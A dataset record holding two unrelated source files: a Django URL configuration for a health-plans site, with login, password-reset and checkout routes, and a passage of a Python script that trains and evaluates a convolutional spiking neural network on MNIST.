ded41c1a9337c4194ef8a07951bd7c21b342f174
|
/healthillc/urls.py
|
8064a8959457eed39ec1433cd7f2e4337001ec26
|
[] |
no_license
|
rasikraj01/healthillc
|
f9a2c175245cbf50f193f7f8b4c232a55bd14980
|
b452fdcbad0e577f8160db769918689b940ae982
|
refs/heads/master
| 2022-12-10T08:19:19.656197 | 2020-02-06T18:52:18 | 2020-02-06T18:52:18 | 238,709,132 | 1 | 0 | null | 2022-11-22T05:17:46 | 2020-02-06T14:37:13 |
HTML
|
UTF-8
|
Python
| false | false | 1,780 |
py
|
from django.conf.urls import url
from django.conf import settings
from django.conf.urls.static import static
from django.urls import path, include
from django.contrib import admin
from django.contrib.auth.views import LoginView, LogoutView, PasswordResetView, PasswordResetDoneView, PasswordResetCompleteView, PasswordResetConfirmView
from users.views import Dashboard, Register, Plans, Checkout
from users import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
path('', include('about.urls')),
path('plans/', Plans.as_view(), name='plans'),
path('dashboard/', Dashboard.as_view(), name='dashboard'),
path('checkout', Checkout.as_view(), name='checkout'),
# path('request/', Request.as_view(), name='request'),
path('response/', views.response, name='response'),
#path('notify/', views.notification_email, name='notification_email'),
path('register/', Register.as_view(), name='register'),
path('login/', LoginView.as_view(template_name='users/login.html'), name="login"),
path('logout/', LogoutView.as_view(template_name='users/logout.html'), name="logout"),
path('password-reset/',
PasswordResetView.as_view(template_name='users/password_reset.html'),
name='password_reset'),
path('password-reset/done/',
PasswordResetDoneView.as_view(template_name='users/password_reset_done.html'),
name='password_reset_done'),
path('password-reset-confirm/<uidb64>/<token>/',
PasswordResetConfirmView.as_view(template_name='users/password_reset_confirm.html'),
name='password_reset_confirm'),
path('password-reset-complete/',
PasswordResetCompleteView.as_view(template_name='users/password_reset_complete.html'),
name='password_reset_complete')
]
|
[
"[email protected]"
] | |
595eacd1e61bf19c94b33e3e829d75688a0ceefb
|
ecb21f6dd5d49b44826974a1c06357a8405aa89e
|
/code/train/csnn_two_level_inhibition.py
|
e9cbb3ff928be0a7613608bfd7d116895e9fcef6
|
[] |
no_license
|
gumpfly/stdp-mnist
|
9924279014e66cb26fab75f1136f38fd05d8fa3e
|
03c32a47e9cd6fe8f902d134c2aa1d04bff037aa
|
refs/heads/master
| 2021-08-15T11:30:13.544379 | 2017-11-17T18:59:49 | 2017-11-17T18:59:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 55,633 |
py
|
'''
Convolutional spiking neural network training, testing, and evaluation script. Evaluation can be done outside of this script; however, it is most straightforward to call this
script with mode=train, then mode=test on HPC systems, where in the test mode, the network evaluation is written to disk.
'''
import warnings
warnings.filterwarnings('ignore')
import matplotlib.cm as cmap
import brian_no_units
import networkx as nx
import cPickle as p
import pandas as pd
import numpy as np
import brian as b
import argparse
import random
import timeit
import time
import math
import os
from mpl_toolkits.axes_grid1 import make_axes_locatable
from scipy.spatial.distance import euclidean
from sklearn.metrics import confusion_matrix
from struct import unpack
from brian import *
from util import *
np.set_printoptions(threshold=np.nan, linewidth=200)
# only show log messages of level ERROR or higher
b.log_level_error()
# set these appropriate to your directory structure
top_level_path = os.path.join('..', '..')
MNIST_data_path = os.path.join(top_level_path, 'data')
model_name = 'csnn_two_level_inhibition'
results_path = os.path.join(top_level_path, 'results', model_name)
performance_dir = os.path.join(top_level_path, 'performance', model_name)
activity_dir = os.path.join(top_level_path, 'activity', model_name)
deltas_dir = os.path.join(top_level_path, 'deltas', model_name)
spikes_dir = os.path.join(top_level_path, 'spikes', model_name)
weights_dir = os.path.join(top_level_path, 'weights', model_name)
best_weights_dir = os.path.join(weights_dir, 'best')
end_weights_dir = os.path.join(weights_dir, 'end')
assignments_dir = os.path.join(top_level_path, 'assignments', model_name)
best_assignments_dir = os.path.join(assignments_dir, 'best')
end_assignments_dir = os.path.join(assignments_dir, 'end')
misc_dir = os.path.join(top_level_path, 'misc', model_name)
best_misc_dir = os.path.join(misc_dir, 'best')
end_misc_dir = os.path.join(misc_dir, 'end')
for d in [ performance_dir, activity_dir, weights_dir, deltas_dir, misc_dir, best_misc_dir,
assignments_dir, best_assignments_dir, MNIST_data_path, results_path,
best_weights_dir, end_weights_dir, end_misc_dir, end_assignments_dir, spikes_dir ]:
if not os.path.isdir(d):
os.makedirs(d)
def normalize_weights():
'''
Squash the input to excitatory synaptic weights to sum to a prespecified number.
'''
for conn_name in input_connections:
connection = input_connections[conn_name][:].todense()
for feature in xrange(conv_features):
feature_connection = connection[:, feature * n_e : (feature + 1) * n_e]
column_sums = np.sum(np.asarray(feature_connection), axis=0)
column_factors = weight['ee_input'] / column_sums
for n in xrange(n_e):
dense_weights = input_connections[conn_name][:, feature * n_e + n].todense()
dense_weights[convolution_locations[n]] *= column_factors[n]
input_connections[conn_name][:, feature * n_e + n] = dense_weights
def plot_input(rates):
'''
Plot the current input example during the training procedure.
'''
fig = plt.figure(fig_num, figsize = (5, 5))
im = plt.imshow(rates.reshape((28, 28)), interpolation='nearest', vmin=0, vmax=64, cmap='binary')
plt.colorbar(im)
plt.title('Current input example')
fig.canvas.draw()
return im, fig
def update_input(rates, im, fig):
'''
Update the input image to use for input plotting.
'''
im.set_array(rates.reshape((28, 28)))
fig.canvas.draw()
return im
def update_assignments_plot(assignments, im):
im.set_array(assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T)
return im
def get_2d_input_weights():
'''
Get the weights from the input to excitatory layer and reshape it to be two
dimensional and square.
'''
# specify the desired shape of the reshaped input -> excitatory weights
rearranged_weights = np.zeros((conv_features * conv_size, conv_size * n_e))
# get the input -> excitatory synaptic weights
connection = input_connections['XeAe'][:]
for n in xrange(n_e):
for feature in xrange(conv_features):
temp = connection[:, feature * n_e + (n // n_e_sqrt) * n_e_sqrt + (n % n_e_sqrt)].todense()
rearranged_weights[ feature * conv_size : (feature + 1) * conv_size, n * conv_size : (n + 1) * conv_size ] = \
temp[convolution_locations[n]].reshape((conv_size, conv_size))
if n_e == 1:
ceil_sqrt = int(math.ceil(math.sqrt(conv_features)))
square_weights = np.zeros((28 * ceil_sqrt, 28 * ceil_sqrt))
for n in xrange(conv_features):
square_weights[(n // ceil_sqrt) * 28 : ((n // ceil_sqrt) + 1) * 28,
(n % ceil_sqrt) * 28 : ((n % ceil_sqrt) + 1) * 28] = rearranged_weights[n * 28 : (n + 1) * 28, :]
return square_weights.T
else:
square_weights = np.zeros((conv_size * features_sqrt * n_e_sqrt, conv_size * features_sqrt * n_e_sqrt))
for n_1 in xrange(n_e_sqrt):
for n_2 in xrange(n_e_sqrt):
for f_1 in xrange(features_sqrt):
for f_2 in xrange(features_sqrt):
square_weights[conv_size * (n_2 * features_sqrt + f_2) : conv_size * (n_2 * features_sqrt + f_2 + 1), \
conv_size * (n_1 * features_sqrt + f_1) : conv_size * (n_1 * features_sqrt + f_1 + 1)] = \
rearranged_weights[(f_1 * features_sqrt + f_2) * conv_size : (f_1 * features_sqrt + f_2 + 1) * conv_size, \
(n_1 * n_e_sqrt + n_2) * conv_size : (n_1 * n_e_sqrt + n_2 + 1) * conv_size]
return square_weights.T
def get_input_weights(weight_matrix):
'''
Get the weights from the input to excitatory layer and reshape it to be two
dimensional and square.
'''
weights = []
# for each convolution feature
for feature in xrange(conv_features):
# for each excitatory neuron in this convolution feature
for n in xrange(n_e):
temp = weight_matrix[:, feature * n_e + (n // n_e_sqrt) * n_e_sqrt + (n % n_e_sqrt)]
weights.append(np.ravel(temp[convolution_locations[n]]))
# return the rearranged weights to display to the user
return weights
def plot_weights_and_assignments(assignments):
'''
Plot the weights from input to excitatory layer to view during training.
'''
weights = get_2d_input_weights()
fig = plt.figure(fig_num, figsize=(18, 9))
ax1 = plt.subplot(121)
image1 = ax1.imshow(weights, interpolation='nearest', vmin=0, vmax=wmax_ee, cmap=cmap.get_cmap('hot_r'))
ax1.set_title(ending.replace('_', ' '))
ax2 = plt.subplot(122)
color = plt.get_cmap('RdBu', 11)
reshaped_assignments = assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T
image2 = ax2.matshow(reshaped_assignments, cmap=color, vmin=-1.5, vmax=9.5)
ax2.set_title('Neuron labels')
divider1 = make_axes_locatable(ax1)
divider2 = make_axes_locatable(ax2)
cax1 = divider1.append_axes("right", size="5%", pad=0.05)
cax2 = divider2.append_axes("right", size="5%", pad=0.05)
plt.colorbar(image1, cax=cax1)
plt.colorbar(image2, cax=cax2, ticks=np.arange(-1, 10))
if n_e != 1:
ax1.set_xticks(xrange(conv_size, conv_size * n_e_sqrt * features_sqrt + 1, conv_size), xrange(1, conv_size * n_e_sqrt * features_sqrt + 1))
ax1.set_yticks(xrange(conv_size, conv_size * n_e_sqrt * features_sqrt + 1, conv_size), xrange(1, conv_size * n_e_sqrt * features_sqrt + 1))
for pos in xrange(conv_size * features_sqrt, conv_size * features_sqrt * n_e_sqrt, conv_size * features_sqrt):
ax1.axhline(pos)
ax1.axvline(pos)
else:
ax1.set_xticks(xrange(conv_size, conv_size * (int(np.sqrt(conv_features)) + 1), conv_size), xrange(1, int(np.sqrt(conv_features)) + 1))
ax1.set_yticks(xrange(conv_size, conv_size * (int(np.sqrt(conv_features)) + 1), conv_size), xrange(1, int(np.sqrt(conv_features)) + 1))
plt.tight_layout()
fig.canvas.draw()
return fig, ax1, ax2, image1, image2
def update_weights_and_assignments(fig, ax1, ax2, im1, im2, assignments, spike_counts):
'''
Update the plot of the weights from input to excitatory layer to view during training.
'''
weights = get_2d_input_weights()
im1.set_array(weights)
reshaped_assignments = assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T
im2.set_array(reshaped_assignments)
for txt in ax2.texts:
txt.set_visible(False)
spike_counts_reshaped = spike_counts.reshape([features_sqrt, features_sqrt])
for x in xrange(features_sqrt):
for y in xrange(features_sqrt):
c = spike_counts_reshaped[x, y]
if c > 0:
ax2.text(x, y, str(c), va='center', ha='center', weight='heavy', fontsize=16)
else:
ax2.text(x, y, '', va='center', ha='center')
fig.canvas.draw()
def get_current_performance(performances, current_example_num):
'''
Evaluate the performance of the network on the past 'update_interval' training
examples.
'''
global input_numbers
current_evaluation = int(current_example_num / update_interval)
if current_example_num == num_examples -1:
current_evaluation+=1
start_num = current_example_num - update_interval
end_num = current_example_num
wrong_idxs = {}
wrong_labels = {}
for scheme in performances.keys():
difference = output_numbers[scheme][start_num : end_num, 0] - input_numbers[start_num : end_num]
correct = len(np.where(difference == 0)[0])
wrong_idxs[scheme] = np.where(difference != 0)[0]
wrong_labels[scheme] = output_numbers[scheme][start_num : end_num, 0][np.where(difference != 0)[0]]
performances[scheme][current_evaluation] = correct / float(update_interval) * 100
return performances, wrong_idxs, wrong_labels
def plot_performance(fig_num, performances, num_evaluations):
'''
Set up the performance plot for the beginning of the simulation.
'''
time_steps = range(0, num_evaluations)
fig = plt.figure(fig_num, figsize = (12, 4))
fig_num += 1
for performance in performances:
plt.plot(time_steps[:np.size(np.nonzero(performances[performance]))], \
np.extract(np.nonzero(performances[performance]), performances[performance]), label=performance)
lines = plt.gca().lines
plt.ylim(ymax=100)
plt.xticks(xrange(0, num_evaluations + 10, 10), xrange(0, ((num_evaluations + 10) * update_interval), 10))
plt.legend()
plt.grid(True)
plt.title('Classification performance per update interval')
fig.canvas.draw()
return lines, fig_num, fig
def update_performance_plot(lines, performances, current_example_num, fig):
'''
Update the plot of the performance based on results thus far.
'''
performances, wrong_idxs, wrong_labels = get_current_performance(performances, current_example_num)
for line, performance in zip(lines, performances):
line.set_xdata(range((current_example_num / update_interval) + 1))
line.set_ydata(performances[performance][:(current_example_num / update_interval) + 1])
fig.canvas.draw()
return lines, performances, wrong_idxs, wrong_labels
def plot_deltas(fig_num, deltas, num_weight_updates):
'''
Set up the performance plot for the beginning of the simulation.
'''
time_steps = range(0, num_weight_updates)
fig = plt.figure(fig_num, figsize = (12, 4))
fig_num += 1
plt.plot([], [], label='Absolute difference in weights')
lines = plt.gca().lines
plt.ylim(ymin=0, ymax=conv_size*n_e_total)
plt.xticks(xrange(0, num_weight_updates + weight_update_interval, 100), \
xrange(0, ((num_weight_updates + weight_update_interval) * weight_update_interval), 100))
plt.legend()
plt.grid(True)
plt.title('Absolute difference in weights per weight update interval')
fig.canvas.draw()
return lines[0], fig_num, fig
def update_deltas_plot(line, deltas, current_example_num, fig):
'''
Update the plot of the performance based on results thus far.
'''
delta = deltas[int(current_example_num / weight_update_interval)]
line.set_xdata(range(int(current_example_num / weight_update_interval) + 1))
ydata = list(line.get_ydata())
ydata.append(delta)
line.set_ydata(ydata)
fig.canvas.draw()
return line, deltas
def predict_label(assignments, spike_rates, accumulated_rates, spike_proportions):
'''
Given the label assignments of the excitatory layer and their spike rates over
the past 'update_interval', get the ranking of each of the categories of input.
'''
output_numbers = {}
for scheme in voting_schemes:
summed_rates = [0] * 10
num_assignments = [0] * 10
if scheme == 'all':
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
summed_rates[i] = np.sum(spike_rates[assignments == i]) / num_assignments[i]
elif scheme == 'all_active':
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
summed_rates[i] = np.sum(np.nonzero(spike_rates[assignments == i])) / num_assignments[i]
elif scheme == 'activity_neighborhood':
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
for idx in np.where(assignments == i)[0]:
if np.sum(spike_rates[idx]) != 0:
neighbors = [idx]
neighbors.extend(get_neighbors(idx, features_sqrt))
summed_rates[i] += np.sum(spike_rates[neighbors]) / \
np.size(np.nonzero(spike_rates[neighbors].ravel()))
elif scheme == 'most_spiked_neighborhood':
neighborhood_activity = np.zeros([conv_features, n_e])
most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool)
for i in xrange(10):
num_assignments[i] = len(np.where(assignments == i)[0])
if num_assignments[i] > 0:
for idx in np.where(assignments == i)[0]:
if np.sum(spike_rates[idx]) != 0:
neighbors = [idx]
neighbors.extend(get_neighbors(idx, features_sqrt))
if np.size(np.nonzero(spike_rates[neighbors])) > 0:
neighborhood_activity[idx] = np.sum(spike_rates[neighbors]) / \
np.size(np.nonzero(spike_rates[neighbors].ravel()))
for n in xrange(n_e):
# find the excitatory neuron which spiked the most in this input location
most_spiked_array[np.argmax(neighborhood_activity[:, n : n + 1]), n] = True
# for each label
for i in xrange(10):
# get the number of label assignments of this type
num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0])
if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0:
# sum the spike rates of all excitatory neurons with this label, which fired the most in its patch
summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i,
most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array]))
elif scheme == 'most_spiked_patch':
most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool)
for feature in xrange(conv_features):
# count up the spikes for the neurons in this convolution patch
column_sums = np.sum(spike_rates[feature : feature + 1, :], axis=0)
# find the excitatory neuron which spiked the most
most_spiked_array[feature, np.argmax(column_sums)] = True
# for each label
for i in xrange(10):
# get the number of label assignments of this type
num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0])
if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0:
# sum the spike rates of all excitatory neurons with this label, which fired the most in its patch
summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i,
most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array]))
elif scheme == 'most_spiked_location':
most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool)
for n in xrange(n_e):
# find the excitatory neuron which spiked the most in this input location
most_spiked_array[np.argmax(spike_rates[:, n : n + 1]), n] = True
# for each label
for i in xrange(10):
# get the number of label assignments of this type
num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0])
if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0:
# sum the spike rates of all excitatory neurons with this label, which fired the most in its patch
summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i,
most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array]))
elif scheme == 'confidence_weighting':
for i in xrange(10):
num_assignments[i] = np.count_nonzero(assignments == i)
if num_assignments[i] > 0:
summed_rates[i] = np.sum(spike_rates[assignments == i] * spike_proportions[(assignments == i).ravel(), i]) / num_assignments[i]
output_numbers[scheme] = np.argsort(summed_rates)[::-1]
return output_numbers
def assign_labels(result_monitor, input_numbers, accumulated_rates, accumulated_inputs):
'''
Based on the results from the previous 'update_interval', assign labels to the
excitatory neurons.
'''
for j in xrange(10):
num_assignments = len(np.where(input_numbers == j)[0])
if num_assignments > 0:
accumulated_inputs[j] += num_assignments
accumulated_rates[:, j] = accumulated_rates[:, j] * 0.9 + \
np.ravel(np.sum(result_monitor[input_numbers == j], axis=0) / num_assignments)
assignments = np.argmax(accumulated_rates, axis=1).reshape((conv_features, n_e))
spike_proportions = np.divide(accumulated_rates, np.sum(accumulated_rates, axis=0))
return assignments, accumulated_rates, spike_proportions
def build_network():
global fig_num, assignments
neuron_groups['e'] = b.NeuronGroup(n_e_total, neuron_eqs_e, threshold=v_thresh_e, refractory=refrac_e, reset=scr_e, compile=True, freeze=True)
neuron_groups['i'] = b.NeuronGroup(n_e_total, neuron_eqs_i, threshold=v_thresh_i, refractory=refrac_i, reset=v_reset_i, compile=True, freeze=True)
for name in population_names:
print '...Creating neuron group:', name
# get a subgroup of size 'n_e' from all exc
neuron_groups[name + 'e'] = neuron_groups['e'].subgroup(conv_features * n_e)
# get a subgroup of size 'n_i' from the inhibitory layer
neuron_groups[name + 'i'] = neuron_groups['i'].subgroup(conv_features * n_e)
# start the membrane potentials of these groups 40mV below their resting potentials
neuron_groups[name + 'e'].v = v_rest_e - 40. * b.mV
neuron_groups[name + 'i'].v = v_rest_i - 40. * b.mV
print '...Creating recurrent connections'
for name in population_names:
# if we're in test mode / using some stored weights
if test_mode:
# load up adaptive threshold parameters
if save_best_model:
neuron_groups['e'].theta = np.load(os.path.join(best_weights_dir, '_'.join(['theta_A', ending +'_best.npy'])))
else:
neuron_groups['e'].theta = np.load(os.path.join(end_weights_dir, '_'.join(['theta_A', ending +'_end.npy'])))
else:
# otherwise, set the adaptive additive threshold parameter at 20mV
neuron_groups['e'].theta = np.ones((n_e_total)) * 20.0 * b.mV
for conn_type in recurrent_conn_names:
if conn_type == 'ei':
# create connection name (composed of population and connection types)
conn_name = name + conn_type[0] + name + conn_type[1]
# create a connection from the first group in conn_name with the second group
connections[conn_name] = b.Connection(neuron_groups[conn_name[0:2]], neuron_groups[conn_name[2:4]], structure='sparse', state='g' + conn_type[0])
# instantiate the created connection
for feature in xrange(conv_features):
for n in xrange(n_e):
connections[conn_name][feature * n_e + n, feature * n_e + n] = 10.4
elif conn_type == 'ie' and not (test_no_inhibition and test_mode):
# create connection name (composed of population and connection types)
conn_name = name + conn_type[0] + name + conn_type[1]
# get weight matrix depending on training or test phase
if test_mode:
if save_best_model and not test_max_inhibition:
weight_matrix = np.load(os.path.join(best_weights_dir, '_'.join([conn_name, ending + '_best.npy'])))
elif test_max_inhibition:
weight_matrix = max_inhib * np.ones((n_e_total, n_e_total))
else:
weight_matrix = np.load(os.path.join(end_weights_dir, '_'.join([conn_name, ending + '_end.npy'])))
# create a connection from the first group in conn_name with the second group
connections[conn_name] = b.Connection(neuron_groups[conn_name[0:2]], neuron_groups[conn_name[2:4]], structure='sparse', state='g' + conn_type[0])
# define the actual synaptic connections and strengths
for feature in xrange(conv_features):
for other_feature in xrange(conv_features):
if feature != other_feature:
if n_e == 1:
x, y = feature // np.sqrt(n_e_total), feature % np.sqrt(n_e_total)
x_, y_ = other_feature // np.sqrt(n_e_total), other_feature % np.sqrt(n_e_total)
else:
x, y = feature // np.sqrt(conv_features), feature % np.sqrt(conv_features)
x_, y_ = other_feature // np.sqrt(conv_features), other_feature % np.sqrt(conv_features)
for n in xrange(n_e):
if test_mode:
connections[conn_name][feature * n_e + n, other_feature * n_e + n] = \
weight_matrix[feature * n_e + n, other_feature * n_e + n]
else:
if inhib_scheme == 'increasing':
connections[conn_name][feature * n_e + n, other_feature * n_e + n] = \
min(max_inhib, start_inhib * \
np.sqrt(euclidean([x, y], [x_, y_])))
elif inhib_scheme == 'eth':
connections[conn_name][feature * n_e + n, \
other_feature * n_e + n] = max_inhib
elif inhib_scheme == 'mhat':
connections[conn_name][feature * n_e + n, \
other_feature * n_e + n] = \
min(max_inhib, start_inhib * \
mhat(np.sqrt(euclidean([x, y], [x_, y_])), \
sigma=1.0, scale=1.0, shift=0.0))
print '...Creating monitors for:', name
# spike rate monitors for excitatory and inhibitory neuron populations
rate_monitors[name + 'e'] = b.PopulationRateMonitor(neuron_groups[name + 'e'], bin=(single_example_time + resting_time) / b.second)
rate_monitors[name + 'i'] = b.PopulationRateMonitor(neuron_groups[name + 'i'], bin=(single_example_time + resting_time) / b.second)
spike_counters[name + 'e'] = b.SpikeCounter(neuron_groups[name + 'e'])
# record neuron population spikes if specified
if record_spikes and do_plot:
spike_monitors[name + 'e'] = b.SpikeMonitor(neuron_groups[name + 'e'])
spike_monitors[name + 'i'] = b.SpikeMonitor(neuron_groups[name + 'i'])
if record_spikes and do_plot:
b.figure(fig_num, figsize=(8, 6))
fig_num += 1
b.ion()
b.subplot(211)
b.raster_plot(spike_monitors['Ae'], refresh=1000 * b.ms, showlast=1000 * b.ms, title='Excitatory spikes per neuron')
b.subplot(212)
b.raster_plot(spike_monitors['Ai'], refresh=1000 * b.ms, showlast=1000 * b.ms, title='Inhibitory spikes per neuron')
b.tight_layout()
# creating Poission spike train from input image (784 vector, 28x28 image)
for name in input_population_names:
input_groups[name + 'e'] = b.PoissonGroup(n_input, 0)
rate_monitors[name + 'e'] = b.PopulationRateMonitor(input_groups[name + 'e'], bin=(single_example_time + resting_time) / b.second)
# creating connections from input Poisson spike train to excitatory neuron population(s)
for name in input_connection_names:
print '\n...Creating connections between', name[0], 'and', name[1]
# for each of the input connection types (in this case, excitatory -> excitatory)
for conn_type in input_conn_names:
# saved connection name
conn_name = name[0] + conn_type[0] + name[1] + conn_type[1]
# get weight matrix depending on training or test phase
if test_mode:
if save_best_model:
weight_matrix = np.load(os.path.join(best_weights_dir, '_'.join([conn_name, ending + '_best.npy'])))
else:
weight_matrix = np.load(os.path.join(end_weights_dir, '_'.join([conn_name, ending + '_end.npy'])))
# create connections from the windows of the input group to the neuron population
input_connections[conn_name] = b.Connection(input_groups['Xe'], neuron_groups[name[1] + conn_type[1]], \
structure='sparse', state='g' + conn_type[0], delay=True, max_delay=delay[conn_type][1])
if test_mode:
for feature in xrange(conv_features):
for n in xrange(n_e):
for idx in xrange(conv_size ** 2):
input_connections[conn_name][convolution_locations[n][idx], feature * n_e + n] = \
weight_matrix[convolution_locations[n][idx], feature * n_e + n]
else:
for feature in xrange(conv_features):
for n in xrange(n_e):
for idx in xrange(conv_size ** 2):
input_connections[conn_name][convolution_locations[n][idx], feature * n_e + n] = (b.random() + 0.01) * 0.3
if test_mode:
if do_plot:
plot_weights_and_assignments(assignments)
fig_num += 1
# if excitatory -> excitatory STDP is specified, add it here (input to excitatory populations)
if not test_mode:
print '...Creating STDP for connection', name
# STDP connection name
conn_name = name[0] + conn_type[0] + name[1] + conn_type[1]
# create the STDP object
stdp_methods[conn_name] = b.STDP(input_connections[conn_name], eqs=eqs_stdp_ee, \
pre=eqs_stdp_pre_ee, post=eqs_stdp_post_ee, wmin=0., wmax=wmax_ee)
print '\n'
def run_train():
global fig_num, input_intensity, previous_spike_count, rates, assignments, clusters, cluster_assignments, \
simple_clusters, simple_cluster_assignments, index_matrix, accumulated_rates, \
accumulated_inputs, spike_proportions
if do_plot:
input_image_monitor, input_image = plot_input(rates)
fig_num += 1
weights_assignments_figure, weights_axes, assignments_axes, weights_image, \
assignments_image = plot_weights_and_assignments(assignments)
fig_num += 1
# set up performance recording and plotting
num_evaluations = int(num_examples / update_interval) + 1
performances = { voting_scheme : np.zeros(num_evaluations) for voting_scheme in voting_schemes }
num_weight_updates = int(num_examples / weight_update_interval)
all_deltas = np.zeros((num_weight_updates, n_e_total))
deltas = np.zeros(num_weight_updates)
if do_plot:
performance_monitor, fig_num, fig_performance = plot_performance(fig_num, performances, num_evaluations)
line, fig_num, deltas_figure = plot_deltas(fig_num, deltas, num_weight_updates)
if plot_all_deltas:
lines, fig_num, all_deltas_figure = plot_all_deltas(fig_num, all_deltas, num_weight_updates)
else:
performances, wrong_idxs, wrong_labels = get_current_performance(performances, 0)
# initialize network
j = 0
num_retries = 0
b.run(0)
if save_best_model:
best_performance = 0.0
# start recording time
start_time = timeit.default_timer()
last_weights = input_connections['XeAe'][:].todense()
current_inhib = start_inhib
while j < num_examples:
# get the firing rates of the next input example
rates = (data['x'][j % data_size, :, :] / 8.0) * input_intensity * \
((noise_const * np.random.randn(n_input_sqrt, n_input_sqrt)) + 1.0)
# sets the input firing rates
input_groups['Xe'].rate = rates.reshape(n_input)
# plot the input at this step
if do_plot:
input_image_monitor = update_input(rates, input_image_monitor, input_image)
# run the network for a single example time
b.run(single_example_time)
# add Gaussian noise to weights after each iteration
if weights_noise:
input_connections['XeAe'].W.alldata[:] *= 1 + (np.random.randn(n_input * conv_features) * weights_noise_constant)
# get new neuron label assignments every 'update_interval'
if j % update_interval == 0 and j > 0:
assignments, accumulated_rates, spike_proportions = assign_labels(result_monitor, input_numbers[j - update_interval : j], accumulated_rates, accumulated_inputs)
# get count of spikes over the past iteration
current_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) - previous_spike_count
previous_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e))
# make sure synapse weights don't grow too large
normalize_weights()
if not j % weight_update_interval == 0 and save_weights:
save_connections(weights_dir, connections, input_connections, ending, j)
save_theta(weights_dir, population_names, neuron_groups, ending, j)
np.save(os.path.join(assignments_dir, '_'.join(['assignments', ending, str(j)])), assignments)
np.save(os.path.join(misc_dir, '_'.join(['accumulated_rates', ending, str(j)])), accumulated_rates)
np.save(os.path.join(misc_dir, '_'.join(['spike_proportions', ending, str(j)])), spike_proportions)
if j % weight_update_interval == 0:
deltas[j / weight_update_interval] = np.sum(np.abs((input_connections['XeAe'][:].todense() - last_weights)))
if plot_all_deltas:
all_deltas[j / weight_update_interval, :] = np.ravel(input_connections['XeAe'][:].todense() - last_weights)
last_weights = input_connections['XeAe'][:].todense()
# pickling performance recording and iteration number
p.dump((j, deltas), open(os.path.join(deltas_dir, ending + '.p'), 'wb'))
# update weights every 'weight_update_interval'
if j % weight_update_interval == 0 and do_plot:
update_weights_and_assignments(weights_assignments_figure, weights_axes, assignments_axes, \
weights_image, assignments_image, assignments, current_spike_count)
# if the neurons in the network didn't spike more than four times
if np.sum(current_spike_count) < 5 and num_retries < 3:
# increase the intensity of input
input_intensity += 2
num_retries += 1
# set all network firing rates to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# let the network relax back to equilibrium
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# otherwise, record results and continue simulation
else:
num_retries = 0
if j == increase_iter:
for feature in xrange(conv_features):
for other_feature in xrange(conv_features):
if feature != other_feature:
for n in xrange(n_e):
connections['AiAe'][feature * n_e + n, \
other_feature * n_e + n] = max_inhib
# record the current number of spikes
result_monitor[j % update_interval, :] = current_spike_count
# get true label of last input example
input_numbers[j] = data['y'][j % data_size][0]
activity = result_monitor[j % update_interval, :] / np.sum(result_monitor[j % update_interval, :])
if do_plot and save_spikes:
fig = plt.figure(9, figsize = (8, 8))
plt.imshow(rates.reshape((28, 28)), interpolation='nearest', vmin=0, vmax=64, cmap='binary')
plt.title(str(data['y'][j % data_size][0]) + ' : ' + ', '.join( \
[str(int(output_numbers[scheme][j, 0])) for scheme in voting_schemes]))
fig = plt.figure(10, figsize = (7, 7))
plt.xticks(xrange(features_sqrt))
plt.yticks(xrange(features_sqrt))
plt.title('Activity heatmap (total spikes = ' + str(np.sum(result_monitor[j % update_interval, :])) + ')')
plt.imshow(activity.reshape((features_sqrt, features_sqrt)).T, interpolation='nearest', cmap='binary')
plt.grid(True)
fig.canvas.draw()
if save_spikes:
np.save(os.path.join(spikes_dir, '_'.join([ending, 'spike_counts', str(j)])), current_spike_count)
np.save(os.path.join(spikes_dir, '_'.join([ending, 'rates', str(j)])), rates)
# get network filter weights
filters = input_connections['XeAe'][:].todense()
# get the output classifications of the network
for scheme, outputs in predict_label(assignments, result_monitor[j % update_interval, :], \
accumulated_rates, spike_proportions).items():
if scheme != 'distance':
output_numbers[scheme][j, :] = outputs
elif scheme == 'distance':
current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel()
output_numbers[scheme][j, 0] = assignments[np.argmin([ euclidean(current_input, \
filters[:, i]) for i in xrange(conv_features) ])]
# print progress
if j % print_progress_interval == 0 and j > 0:
print 'runs done:', j, 'of', int(num_examples), '(time taken for past', print_progress_interval, 'runs:', str(timeit.default_timer() - start_time) + ')'
start_time = timeit.default_timer()
if j % weight_update_interval == 0 and do_plot:
update_deltas_plot(line, deltas, j, deltas_figure)
if plot_all_deltas:
update_all_deltas_plot(lines, all_deltas, j, all_deltas_figure)
# plot performance if appropriate
if (j % update_interval == 0 or j == num_examples - 1) and j > 0:
if do_plot:
# updating the performance plot
perf_plot, performances, wrong_idxs, wrong_labels = update_performance_plot(performance_monitor, performances, j, fig_performance)
else:
performances, wrong_idxs, wrong_labels = get_current_performance(performances, j)
# pickling performance recording and iteration number
